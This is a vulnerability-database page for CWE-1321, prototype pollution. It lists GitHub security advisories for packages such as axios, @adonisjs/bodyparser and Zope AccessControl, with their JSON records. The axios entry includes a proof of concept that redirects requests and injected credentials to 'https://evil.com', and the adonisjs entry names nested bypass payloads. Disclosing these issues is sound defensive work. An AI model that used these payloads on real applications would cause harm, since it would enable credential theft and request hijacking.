Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

779 vulnerabilities reference this CWE, most recent first.

GHSA-Q8JQ-4RM5-4HM5

Vulnerability from github – Published: 2025-04-01 14:54 – Updated: 2025-04-01 14:54
VLAI
Summary
@alizeait/unflatto Prototype Pollution
Details

Impact

alizeait unflatto <= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

Patches

The problem has been patched in 1.0.3

References

https://github.com/advisories/GHSA-799q-f2px-wx8c

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@alizeait/unflatto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-38988"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-01T14:54:36Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\nalizeait unflatto \u003c= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.\n\n### Patches\nThe problem has been patched in 1.0.3\n\n\n### References\nhttps://github.com/advisories/GHSA-799q-f2px-wx8c",
  "id": "GHSA-q8jq-4rm5-4hm5",
  "modified": "2025-04-01T14:54:37Z",
  "published": "2025-04-01T14:54:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/alizeait/unflatto/security/advisories/GHSA-q8jq-4rm5-4hm5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alizeait/unflatto/issues/32"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alizeait/unflatto/commit/3c1b120f1dcd44eefe07d4a5022e1baa3c7164d3"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mestrtee/4c5dfb66bea377889c44dd6c8af28713"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/alizeait/unflatto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@alizeait/unflatto Prototype Pollution"
}

GHSA-Q8QP-CVCW-X6JJ

Vulnerability from github – Published: 2026-05-05 00:18 – Updated: 2026-05-12 13:28
VLAI
Summary
Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking
Details

Summary

Five config properties in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.

Affected Properties

  1. config.auth (lib/adapters/http.js line 617) Injects attacker-controlled Authorization header on all requests.
  2. config.baseURL (lib/helpers/resolveConfig.js line 18) Redirects all requests using relative URLs to an attacker-controlled server.
  3. config.socketPath (lib/adapters/http.js line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).
  4. config.beforeRedirect (lib/adapters/http.js line 698) Executes attacker-supplied callback during HTTP redirects.
  5. config.insecureHTTPParser (lib/adapters/http.js line 712) Enables Node.js insecure HTTP parser on all requests.

Proof of Concept

const axios = require('axios');

// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';

await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentials

Impact

  • Credential injection: Every axios request includes an attacker-controlled Authorization header, leaking request contents to any server that logs auth headers.
  • Request hijacking: All requests using relative URLs are silently redirected to an attacker-controlled server.
  • SSRF: Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.
  • Code execution: Attacker-supplied functions execute during HTTP redirects.
  • Parser weakening: Insecure HTTP parser enabled on all requests, enabling request smuggling.

Root Cause

mergeConfig() iterates Object.keys({...config1, ...config2}), which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (config.auth, config.socketPath, etc.), which traverses the prototype chain and picks up polluted values.

The own() helper at lib/adapters/http.js line 336 exists and guards 8 other properties (data, lookup, family, httpVersion, http2Options, responseType, responseEncoding, transport) from this exact attack. The 5 properties listed above are not included in this protection.

Suggested Fix

Apply the existing own() helper to all affected properties:

const configAuth = own('auth');
if (configAuth) {
  const username = configAuth.username || '';
  const password = configAuth.password || '';
  auth = username + ':' + password;
}

Same pattern for socketPath, beforeRedirect, insecureHTTPParser, and a hasOwnProperty check for baseURL in resolveConfig.js.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.15.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42264"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T00:18:38Z",
    "nvd_published_at": "2026-05-08T04:16:20Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nFive config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.\n\n## Affected Properties\n\n1. **`config.auth`** (`lib/adapters/http.js` line 617)  Injects attacker-controlled `Authorization` header on all requests.\n2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18) Redirects all requests using relative URLs to an attacker-controlled server.\n3. **`config.socketPath`** (`lib/adapters/http.js` line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).\n4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698) Executes attacker-supplied callback during HTTP redirects.\n5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712) Enables Node.js insecure HTTP parser on all requests.\n\n## Proof of Concept\n\n```javascript\nconst axios = require(\u0027axios\u0027);\n\n// Prototype pollution from a vulnerable dependency in the same process\nObject.prototype.auth = { username: \u0027attacker\u0027, password: \u0027exfil\u0027 };\nObject.prototype.baseURL = \u0027https://evil.com\u0027;\n\nawait axios.get(\u0027/api/users\u0027);\n// Request is sent to: https://evil.com/api/users\n// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=\n// Attacker receives both the request and injected credentials\n```\n\n## Impact\n\n- **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers.\n- **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server.\n- **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.\n- **Code execution:** Attacker-supplied functions execute during HTTP redirects.\n- **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling.\n\n## Root Cause\n\n`mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values.\n\nThe `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection.\n\n## Suggested Fix\n\nApply the existing `own()` helper to all affected properties:\n\n```javascript\nconst configAuth = own(\u0027auth\u0027);\nif (configAuth) {\n  const username = configAuth.username || \u0027\u0027;\n  const password = configAuth.password || \u0027\u0027;\n  auth = username + \u0027:\u0027 + password;\n}\n```\n\nSame pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`.",
  "id": "GHSA-q8qp-cvcw-x6jj",
  "modified": "2026-05-12T13:28:40Z",
  "published": "2026-05-05T00:18:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42264"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/pull/10779"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v1.15.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking"
}

GHSA-Q9WR-GCJC-HQ52

Vulnerability from github – Published: 2020-09-04 15:12 – Updated: 2020-08-31 18:55
VLAI
Summary
Prototype Pollution in reggae
Details

All versions of reggae are vulnerable to prototype pollution. The function set does not restrict the modification of an Object's prototype, which may allow a malicious to add or modify an existing property that will exist on all objects.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "reggae"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:55:23Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "All versions of `reggae` are vulnerable to prototype pollution. The function `set` does not restrict the modification of an Object\u0027s prototype, which may allow a malicious to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
  "id": "GHSA-q9wr-gcjc-hq52",
  "modified": "2020-08-31T18:55:23Z",
  "published": "2020-09-04T15:12:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1331"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Prototype Pollution in reggae"
}

GHSA-Q9XG-H756-8689

Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2023-07-11 17:00
VLAI
Summary
jquery-plugin-query-object contains prototype pollution vulnerability
Details

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in jquery-plugin-query-object 2.2.3 allows a malicious user to inject properties into Object.prototype.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jquery-query-object"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-20083"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-11T17:00:33Z",
    "nvd_published_at": "2021-04-23T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in jquery-plugin-query-object 2.2.3 allows a malicious user to inject properties into Object.prototype.",
  "id": "GHSA-q9xg-h756-8689",
  "modified": "2023-07-11T17:00:33Z",
  "published": "2022-05-24T17:48:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20083"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/jquery-query-object.md"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CR6VGITIB2TXXZ6B5QRRWPU5S4BXQPD"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IJX6NVXSRN3RX3YUVEJQ4WUTQSDL3DSR"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/166299/WordPress-Core-5.9.0-5.9.1-Cross-Site-Scripting.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "jquery-plugin-query-object contains prototype pollution vulnerability"
}

GHSA-QCCF-Q7P4-3Q3J

Vulnerability from github – Published: 2020-09-04 15:16 – Updated: 2020-08-31 18:55
VLAI
Summary
Prototype Pollution in safe-object2
Details

All versions of safe-object2 are vulnerable to prototype pollution. The settter() function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "safe-object2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:55:32Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "All versions of `safe-object2` are vulnerable to prototype pollution. The `settter()` function does not restrict the modification of an Object\u0027s prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
  "id": "GHSA-qccf-q7p4-3q3j",
  "modified": "2020-08-31T18:55:32Z",
  "published": "2020-09-04T15:16:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1335"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Prototype Pollution in safe-object2"
}

GHSA-QCM7-3VPR-HJ5H

Vulnerability from github – Published: 2026-06-30 18:34 – Updated: 2026-06-30 18:34
VLAI
Summary
@adonisjs/bodyparser has an incomplete fix for CVE-2026-25754
Details

Summary

The fix for GHSA-f5x2-vj4h-vg4c / CVE-2026-25754 introduced in commit 40e1c71 is incomplete and can be bypassed through nested prototype pollution payloads.

The original patch replaced the internal FormFields storage object with Object.create(null), preventing direct payloads such as __proto__.polluted. However, payloads containing a non-dangerous segment before __proto__ or constructor.prototype, such as user.__proto__.polluted, still lead to Object.prototype pollution.

This issue is exploitable remotely through a single unauthenticated multipart/form-data request using the default configuration.

Affected versions

  • >= 10.1.3 < 10.1.5
  • >= 11.0.0-next.9 < 11.0.3

Details

The regression tests added by the original fix only covered direct payloads such as:

  • __proto__.polluted
  • constructor.prototype.polluted

These payloads are blocked because the root object no longer inherits from Object.prototype.

However, lodash _.set() (via @poppinss/utils) still creates intermediate objects using plain {} values. Once a normal segment is encountered, subsequent __proto__ or constructor.prototype segments regain access to Object.prototype.

Impact

An unauthenticated attacker can remotely pollute Object.prototype on any route accepting multipart/form-data requests behind BodyParserMiddleware.

Because the pollution is process-wide, the impact may include authorization bypasses, unexpected behavior in downstream libraries, or prototype pollution gadget chains leading to remote code execution.

Patches

Fixes targeting v6 and v7 have been published below.

Users should upgrade to a version that includes the following fix:

  • https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5
  • https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3

References

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.1.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@adonisjs/bodyparser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.1.3"
            },
            {
              "fixed": "10.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 11.0.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@adonisjs/bodyparser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0-next.9"
            },
            {
              "fixed": "11.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48795"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-30T18:34:32Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe fix for [GHSA-f5x2-vj4h-vg4c](https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c) / CVE-2026-25754 introduced in commit [`40e1c71`](https://github.com/adonisjs/bodyparser/commit/40e1c71f958cffb74f6b91bed6630dca979062ed) is incomplete and can be bypassed through nested prototype pollution payloads.\n\nThe original patch replaced the internal `FormFields` storage object with `Object.create(null)`, preventing direct payloads such as `__proto__.polluted`. However, payloads containing a non-dangerous segment before `__proto__` or `constructor.prototype`, such as `user.__proto__.polluted`, still lead to `Object.prototype` pollution.\n\nThis issue is exploitable remotely through a single unauthenticated `multipart/form-data` request using the default configuration.\n\n### Affected versions\n\n- `\u003e= 10.1.3 \u003c 10.1.5`\n- `\u003e= 11.0.0-next.9 \u003c 11.0.3`\n\n### Details\n\nThe regression tests added by the original fix only covered direct payloads such as:\n\n- `__proto__.polluted`\n- `constructor.prototype.polluted`\n\nThese payloads are blocked because the root object no longer inherits from `Object.prototype`.\n\nHowever, lodash `_.set()` (via `@poppinss/utils`) still creates intermediate objects using plain `{}` values. Once a normal segment is encountered, subsequent `__proto__` or `constructor.prototype` segments regain access to `Object.prototype`.\n\n### Impact\n\nAn unauthenticated attacker can remotely pollute `Object.prototype` on any route accepting multipart/form-data requests behind `BodyParserMiddleware`.\n\nBecause the pollution is process-wide, the impact may include authorization bypasses, unexpected behavior in downstream libraries, or prototype pollution gadget chains leading to remote code execution.\n\n### Patches\n\nFixes targeting v6 and v7 have been published below.\n\nUsers should upgrade to a version that includes the following fix:\n\n- https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5\n- https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3\n\n### References\n\n- [CWE-1321](https://cwe.mitre.org/data/definitions/1321.html)\n- Prior advisory this bypasses: [GHSA-f5x2-vj4h-vg4c](https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c) / CVE-2026-25754",
  "id": "GHSA-qcm7-3vpr-hj5h",
  "modified": "2026-06-30T18:34:32Z",
  "published": "2026-06-30T18:34:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/core/security/advisories/GHSA-qcm7-3vpr-hj5h"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/bodyparser/commit/40e1c71f958cffb74f6b91bed6630dca979062ed"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/adonisjs/core"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@adonisjs/bodyparser has an incomplete fix for CVE-2026-25754"
}

GHSA-QCX9-J53G-CCGF

Vulnerability from github – Published: 2021-08-05 17:01 – Updated: 2026-06-09 13:03
VLAI
Summary
Remote Code Execution via unsafe classes in otherwise permitted modules
Details

Impact

The module AccessControl defines security policies for Python code used in restricted code within Zope applications. Restricted code is any code that resides in Zope's object database, such as the contents of Script (Python) objects.

The policies defined in AccessControl severely restrict access to Python modules and only exempt a few that are deemed safe, such as Python's string module. However, full access to the string module also allows access to the class Formatter, which can be overridden and extended within Script (Python) in a way that provides access to other unsafe Python libraries. Those unsafe Python libraries can be used for remote code execution.

By default, you need to have the admin-level Zope "Manager" role to add or edit Script (Python) objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web - which would be a very unusual configuration to begin with - are at risk.

Patches

The problem has been fixed in AccessControl 4.3 and 5.2. Only AccessControl versions 4 and 5 are vulnerable, and only on Python 3, not Python 2.7.

Workarounds

A site administrator can restrict adding/editing Script (Python) objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope.

For more information

If you have any questions or comments about this advisory: * Open an issue in the AccessControl issue tracker * Email us at security@plone.org

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "AccessControl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0"
            },
            {
              "fixed": "4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "AccessControl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0"
            },
            {
              "fixed": "5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "zope"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0"
            },
            {
              "fixed": "4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "zope"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0"
            },
            {
              "fixed": "5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-32807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-02T23:00:00Z",
    "nvd_published_at": "2021-07-30T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nThe module `AccessControl` defines security policies for Python code used in restricted code within Zope applications. Restricted code is any code that resides in Zope\u0027s object database, such as the contents of `Script (Python)` objects. \n\nThe policies defined in `AccessControl` severely restrict access to Python modules and only exempt a few that are deemed safe, such as Python\u0027s `string` module. However, full access to the `string` module also allows access to the class `Formatter`, which can be overridden and extended within `Script (Python)` in a way that provides access to other unsafe Python libraries. Those unsafe Python libraries can be used for remote code execution.\n\nBy default, you need to have the admin-level Zope \"Manager\" role to add or edit `Script (Python)` objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web - which would be a very unusual configuration to begin with - are at risk.\n\n### Patches\nThe problem has been fixed in AccessControl 4.3 and 5.2.\nOnly AccessControl versions 4 and 5 are vulnerable, and only on Python 3, not Python 2.7.\n\n### Workarounds\nA site administrator can restrict adding/editing `Script (Python)` objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [AccessControl issue tracker](https://github.com/zopefoundation/AccessControl/issues)\n* Email us at [security@plone.org](mailto:security@plone.org)",
  "id": "GHSA-qcx9-j53g-ccgf",
  "modified": "2026-06-09T13:03:00Z",
  "published": "2021-08-05T17:01:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/AccessControl/security/advisories/GHSA-qcx9-j53g-ccgf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/Zope/security/advisories/GHSA-g4gq-j4p2-j8fr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32807"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/AccessControl/commit/ae2dab0cc34e6dd1561c5b12d4a56cd140f87e1d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/AccessControl/commit/b42dd4badf803bb9fb71ac34cd9cb0c249262f2c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/Zope/commit/869f947e586517566509e0ccdd4d99b60704cc02"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/Zope/commit/f72a18dda8e9bf2aedb46168761668464a4be988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/accesscontrol/PYSEC-2021-335.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/accesscontrol/PYSEC-2021-370.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/zope/PYSEC-2021-368.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/zope/PYSEC-2021-875.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zopefoundation/AccessControl"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/AccessControl/blob/master/CHANGES.rst#51-2021-07-30"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Remote Code Execution via unsafe classes in otherwise permitted modules"
}

GHSA-QF67-WFX4-7JWW

Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-14 18:30
VLAI
Details

Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-34622"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-14T17:16:51Z",
    "severity": "HIGH"
  },
  "details": "Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.",
  "id": "GHSA-qf67-wfx4-7jww",
  "modified": "2026-04-14T18:30:36Z",
  "published": "2026-04-14T18:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34622"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/acrobat/apsb26-44.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QHXH-9HHX-6P7V

Vulnerability from github – Published: 2021-08-02 16:59 – Updated: 2021-07-26 17:47
VLAI
Summary
Prototype Pollution in GraphHopper
Details

This affects the package com.graphhopper:graphhopper-web-bundle before 3.2, from 4.0-pre1 and before 4.0. The URL parser could be tricked into adding or modifying properties of Object.prototype using a constructor or proto payload.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.graphhopper:graphhopper-web-bundle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-23408"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-07-26T17:47:03Z",
    "nvd_published_at": "2021-07-21T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "This affects the package `com.graphhopper:graphhopper-web-bundle` before 3.2, from 4.0-pre1 and before 4.0. The URL parser could be tricked into adding or modifying properties of Object.prototype using a constructor or __proto__ payload.",
  "id": "GHSA-qhxh-9hhx-6p7v",
  "modified": "2021-07-26T17:47:03Z",
  "published": "2021-08-02T16:59:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23408"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphhopper/graphhopper/pull/2370"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphhopper/graphhopper/releases/tag/3.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphhopper/graphhopper/releases/tag/3.2"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-COMGRAPHHOPPER-1320114"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in GraphHopper"
}

GHSA-QJ86-V6M7-4QV2

Vulnerability from github – Published: 2024-06-17 18:31 – Updated: 2024-07-05 21:14
VLAI
Summary
Object Resolver Prototype Pollution
Details

